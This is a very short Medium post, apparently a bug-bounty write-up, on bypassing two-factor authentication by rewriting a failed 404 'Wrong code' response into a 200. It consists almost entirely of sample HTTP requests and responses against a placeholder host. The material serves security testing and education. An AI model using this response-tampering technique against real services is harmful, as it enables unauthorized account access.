Bypass 2FA Using Status Code Manipulation

POST /api/2fa/verify-code/ HTTP/1.1
Host: site.com
[...]
{"code":"12345","remember_me":false}
HTTP/1.1 404 Not Found
[...]
{"status":"Wrong code"}
HTTP/1.1 200 OK
[...]
{"id":"111111111-aaaa-dddd-fffff-xxxxxxxxxx","code":"123456"}
HTTP/1.1 200 OK
[...]
{"status":"Wrong code"}

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store